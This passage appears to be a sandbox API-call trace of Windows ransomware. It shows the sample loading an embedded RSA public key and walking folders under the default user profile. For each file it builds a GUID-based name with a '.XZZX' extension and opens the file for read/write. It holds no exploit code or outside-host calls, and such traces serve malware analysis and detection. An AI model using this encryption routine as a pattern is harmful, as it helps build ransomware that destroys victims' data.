LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0138.847] lstrcpyW (in: lpString1=0x420f460, lpString2="Windows Live Spaces.url" | out: lpString1="Windows Live Spaces.url") returned="Windows Live Spaces.url" [0138.847] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" [0138.847] SetErrorMode (uMode=0x1) returned 0x1 [0138.847] lstrcpyW (in: lpString1=0x420f860, lpString2="Windows Live Spaces.url" | out: lpString1="Windows Live Spaces.url") returned="Windows Live Spaces.url" [0138.847] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x492417b7, Data2=0xa917, Data3=0x46da, Data4=([0]=0xa5, [1]=0xbe, [2]=0xd6, [3]=0x53, [4]=0x45, [5]=0x9f, [6]=0xde, [7]=0x5b))) returned 0x0 [0138.847] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 67 [0138.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0138.847] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\65E5F0712ECC4796492417B732ED2BDE.XZZX") returned 81 [0138.847] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="XZZX") returned 0x0 [0138.847] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url", dwFileAttributes=0x20) returned 0 [0138.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 490 os_tid = 0xb00 [0139.016] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0139.016] lstrcpyW (in: lpString1=0x420f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0139.016] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Links\\" [0139.016] SetErrorMode (uMode=0x1) returned 0x1 [0139.016] lstrcpyW (in: lpString1=0x420f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0139.016] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x24c3e1a9, Data2=0xac6d, Data3=0x4b7c, Data4=([0]=0x91, [1]=0x3c, [2]=0xc8, [3]=0xde, [4]=0xd5, [5]=0x8c, [6]=0xc0, [7]=0xbf))) returned 0x0 [0139.016] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini") returned 38 [0139.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0139.016] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\4304A0F532D773CC24C3E1A936F85814.XZZX") returned 64 [0139.016] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0139.016] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini", dwFileAttributes=0x20) returned 0 [0139.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 491 os_tid = 0xb04 [0139.158] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0139.158] lstrcpyW (in: lpString1=0x420f460, lpString2="Desktop.lnk" | out: lpString1="Desktop.lnk") returned="Desktop.lnk" [0139.158] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Links\\" [0139.158] SetErrorMode (uMode=0x1) returned 0x1 [0139.158] lstrcpyW (in: lpString1=0x420f860, lpString2="Desktop.lnk" | out: lpString1="Desktop.lnk") returned="Desktop.lnk" [0139.158] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x9c677b34, Data2=0xec06, Data3=0x40e9, Data4=([0]=0xb3, [1]=0xdc, [2]=0x57, [3]=0xe5, [4]=0x1c, [5]=0x8d, [6]=0x13, [7]=0x9))) returned 0x0 [0139.158] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk") returned 38 [0139.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0139.158] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\1000D3383BD851769C677B343FF935BE.XZZX") returned 64 [0139.159] StrStrW (lpFirst="Desktop.lnk", lpSrch="XZZX") returned 0x0 [0139.159] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk", dwFileAttributes=0x20) returned 0 [0139.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 492 os_tid = 0xb08 [0139.314] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0139.314] lstrcpyW (in: lpString1=0x420f460, lpString2="Downloads.lnk" | out: lpString1="Downloads.lnk") returned="Downloads.lnk" [0139.314] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Links\\" [0139.315] SetErrorMode (uMode=0x1) returned 0x1 [0139.315] lstrcpyW (in: lpString1=0x420f860, lpString2="Downloads.lnk" | out: lpString1="Downloads.lnk") returned="Downloads.lnk" [0139.315] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xb7e05d2e, Data2=0x2430, Data3=0x4f73, Data4=([0]=0xb2, [1]=0xb9, [2]=0x67, [3]=0x9f, [4]=0x6a, [5]=0x51, [6]=0x3a, [7]=0x28))) returned 0x0 [0139.315] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk") returned 40 [0139.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0139.315] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\072BF0A00B3B1190B7E05D2E0F5BF5D8.XZZX") returned 64 [0139.315] StrStrW (lpFirst="Downloads.lnk", lpSrch="XZZX") returned 0x0 [0139.315] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk", dwFileAttributes=0x20) returned 0 [0139.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 493 os_tid = 0xb10 [0139.471] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0139.471] lstrcpyW (in: lpString1=0x420f460, lpString2="RecentPlaces.lnk" | out: lpString1="RecentPlaces.lnk") returned="RecentPlaces.lnk" [0139.471] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Links\\" [0139.471] SetErrorMode (uMode=0x1) returned 0x1 [0139.471] lstrcpyW (in: lpString1=0x420f860, lpString2="RecentPlaces.lnk" | out: lpString1="RecentPlaces.lnk") returned="RecentPlaces.lnk" [0139.471] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x7a814c90, Data2=0xd31a, Data3=0x4c9c, Data4=([0]=0xa8, [1]=0xf5, [2]=0x9c, [3]=0x1e, [4]=0x54, [5]=0x27, [6]=0x8e, [7]=0xf5))) returned 0x0 [0139.471] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk") returned 43 [0139.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0139.471] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\033C76A03F2C5BD87A814C90434D4020.XZZX") returned 64 [0139.471] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="XZZX") returned 0x0 [0139.471] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk", dwFileAttributes=0x20) returned 0 [0139.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 494 os_tid = 0xb14 [0139.638] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0139.638] lstrcpyW (in: lpString1=0x420f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0139.639] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music\\") returned="\\\\?\\C:\\Users\\Default\\Music\\" [0139.639] SetErrorMode (uMode=0x1) returned 0x1 [0139.639] lstrcpyW (in: lpString1=0x420f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0139.639] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xa5b76972, Data2=0xab37, Data3=0x45f2, Data4=([0]=0xa7, [1]=0x81, [2]=0xf6, [3]=0x48, [4]=0xb0, [5]=0x4c, [6]=0x46, [7]=0xbf))) returned 0x0 [0139.639] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini") returned 38 [0139.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0139.639] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Music\\1DD6CD7E2EC7ACFEA5B7697232E89146.XZZX") returned 64 [0139.639] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0139.639] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini", dwFileAttributes=0x20) returned 0 [0139.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 495 os_tid = 0xb18 [0139.792] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0139.792] lstrcpyW (in: lpString1=0x420f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0139.792] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Pictures\\") returned="\\\\?\\C:\\Users\\Default\\Pictures\\" [0139.792] SetErrorMode (uMode=0x1) returned 0x1 [0139.792] lstrcpyW (in: lpString1=0x420f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0139.794] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x84fe80c5, Data2=0xfc51, Data3=0x4d09, Data4=([0]=0xbd, [1]=0x6c, [2]=0xd4, [3]=0x92, [4]=0xfb, [5]=0xd0, [6]=0x3c, [7]=0x41))) returned 0x0 [0139.794] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini") returned 41 [0139.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0139.794] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Pictures\\9B48AA554BED3BD984FE80C5500E2021.XZZX") returned 67 [0139.794] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0139.794] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini", dwFileAttributes=0x20) returned 0 [0139.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini" (normalized: "c:\\users\\default\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 496 os_tid = 0xb1c [0139.950] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0139.950] lstrcpyW (in: lpString1=0x420f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0139.950] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Saved Games\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Saved Games\\") returned="\\\\?\\C:\\Users\\Default\\Saved Games\\" [0139.950] SetErrorMode (uMode=0x1) returned 0x1 [0139.950] lstrcpyW (in: lpString1=0x420f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0139.950] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x8632389b, Data2=0x2c76, Data3=0x410b, Data4=([0]=0xbb, [1]=0xb5, [2]=0x7, [3]=0x59, [4]=0xcd, [5]=0x13, [6]=0x96, [7]=0x7a))) returned 0x0 [0139.950] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini") returned 44 [0139.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0139.950] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Saved Games\\7CE0BB720B4BDF128632389B0F6CC35A.XZZX") returned 70 [0139.950] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0139.950] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini", dwFileAttributes=0x20) returned 0 [0139.950] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini" (normalized: "c:\\users\\default\\saved games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 497 os_tid = 0xb20 [0140.098] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0140.098] lstrcpyW (in: lpString1=0x420f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0140.098] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches\\") returned="\\\\?\\C:\\Users\\Default\\Searches\\" [0140.098] SetErrorMode (uMode=0x1) returned 0x1 [0140.098] lstrcpyW (in: lpString1=0x420f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0140.098] 